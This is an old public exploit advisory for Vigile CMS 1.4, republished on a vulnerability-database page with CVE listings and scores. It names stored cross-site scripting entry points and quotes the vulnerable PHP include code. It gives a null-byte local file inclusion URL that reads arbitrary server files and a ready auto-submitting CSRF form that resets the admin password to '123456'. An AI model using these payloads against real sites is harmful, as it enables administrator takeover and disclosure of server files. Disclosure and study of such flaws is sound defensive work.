Vigile CMS 1.4 - Multiple Vulnerabilities
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2007-6085 | 22 Nov 200700:00 | – | cve | |
| CVE-2007-6086 | 22 Nov 200700:00 | – | cve | |
| CVE-2007-6087 | 22 Nov 200700:00 | – | cve | |
| CVE-2007-6085 | 22 Nov 200700:00 | – | cvelist | |
| CVE-2007-6086 | 22 Nov 200700:00 | – | cvelist | |
| CVE-2007-6087 | 22 Nov 200700:00 | – | cvelist | |
| EUVD-2007-6054 | 7 Oct 202500:30 | – | euvd | |
| EUVD-2007-6055 | 7 Oct 202500:30 | – | euvd | |
| EUVD-2007-6056 | 7 Oct 202500:30 | – | euvd | |
| CVE-2007-6085 | 22 Nov 200700:46 | – | nvd |
10
---------------------------------------------------------------------------------------
.___ .__.__
__| _/_______ _|__| | _____ __ _________ ____ ____
/ __ |/ __ \ \/ / | | \__ \ | | \_ __ \/ _ \ / \
/ /_/ \ ___/\ /| | |__/ __ \| | /| | \( <_> ) | \
\____ |\___ >\_/ |__|____(____ /____/ |__| \____/|___| /
\/ \/ \/ \/
---------------------------------------------------------------------------------------
Status : Public
Author : DevilAuron
Board : VigileCMS
Site : http://devilsnight.altervista.org
Date : [16-11-2007] (dd-mm-yyyy)
---------------------------------------------------------------------------------------
VigileCMS Multiple Vulnerabilities
---------------------------------------------------------------------------------------
Permanent Xss:
---------------------------------------------------------------------------------------
http://[site]/[path]/index.php?module=vedipm&inviapm=true
http://[site]/[path]/index.php?module=live_chat
Insert on the message the xss
---------------------------------------------------------------------------------------
Local File Inclusion:
---------------------------------------------------------------------------------------
index.php
---------------------------------------------------------------------------------------
if (file_exists("$_GET[module].php")) {
include ($_GET['module'].".php");
} else {
include ("pagine/".$_GET['module'].".php");
}
navdx3("100%");
} else {
announcement ("<center><li><font color=\"red\">File non esistente</font></center>");
}
---------------------------------------------------------------------------------------
Then u can include all file present on the server
http://[site]/[path]/index.php?module=[somefile]%00
---------------------------------------------------------------------------------------
CSRF:
---------------------------------------------------------------------------------------
Change Admin Password:
---------------------------------------------------------------------------------------
<form name="cambia" method="post" action="http://127.0.0.1/VIGILE_1.4/index.php?module=changepass">
<input type="password" name="new1" maxlength=20 value="123456">
<input type="password" name="new2" maxlength=20 value="123456">
<input type="hidden" name="pw" value="Cambia la Password">
</form>
<script>document.cambia.submit()</script>
---------------------------------------------------------------------------------------
DevilAuron - http://devilsnight.altervista.org
---------------------------------------------------------------------------------------
# milw0rm.com [2007-11-18]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Nov 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.02943